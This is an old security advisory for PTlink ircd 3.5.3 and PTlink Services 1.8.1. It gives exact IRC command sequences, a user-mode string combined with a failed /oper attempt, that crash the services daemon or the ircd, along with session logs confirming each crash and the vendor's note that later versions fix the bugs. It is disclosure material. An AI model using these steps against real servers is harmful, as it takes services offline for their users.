COMMAND
PTlink
SYSTEMS AFFECTED
PTlink3.5.3ircd + PTlink.Services.1.8.1...
PROBLEM
'egocentric coder' (wildcoyote) found following. It is possible
to kill the ircd and it's services... To do so, you must connect
to the irc server... Then, do the following: Issue a
/mode <your nick> +owgscfxeb
and a
/oper <oper nick> <something, doesnt really matter> command!
This will cause the server to:
/mode <your nick> +owgscfxeb
[23:25] *** whocares sets mode: +wgsx
/oper <oper nick> <something, doesnt really matter>
-
Password Incorrect
-
[23:25] -freddy.userfriendly- Your attempt has been logged.
-
[23:26] -freddy.userfriendly- *** Notice -- Connection to
services.freddy.userfriendly[*@192.168.0.3] activated.
-
[23:26] -freddy.userfriendly- *** Notice -- Lost connection to
services.freddy.userfriendly[192.168.0.3]:Broken pipe
-
[root@freddy wildcoyote]# ps aux | grep services
[root@freddy wildcoyote]#
So, this crashed service.... What about ircd?
Connect to the irc server... Then, do the following. Issue a
/oper <oper nick> <something, doesnt really matter>
and a
/mode <your nick> +owgscfxeb
command!
This will cause the server to:
[23:43] -NickServ- This nickname is registered and protected. If it is your
-
[23:43] -NickServ- nick, type /NickServ IDENTIFY password. Otherwise,
-
[23:43] -NickServ- please choose a different nick.
-
[23:43] -NickServ- If you do not change within one minute, your nick will be changed.
/oper wildcoyote whocares
-
Password Incorrect
-
[23:43] -freddy.userfriendly- Your attempt has been logged.
/mode mynick +owgscfxeb
-
[23:44] *** Disconnected
[root@freddy wildcoyote]# ps aux | grep ircd
[root@freddy wildcoyote]#
SOLUTION
PTLink Coders Team gave following response:
a) This version of ircd was discontinued more than 1 YEAR AGO!!
b) The current version of PTLink ircd is 5.7.1
c) The current version of PTLink Services is 2.14.3
d) all those bugs were corrected in later versions
So, those bugs where not found by wildcoyote; they were reported
in PTLink Coders ML and in changelog of later versions.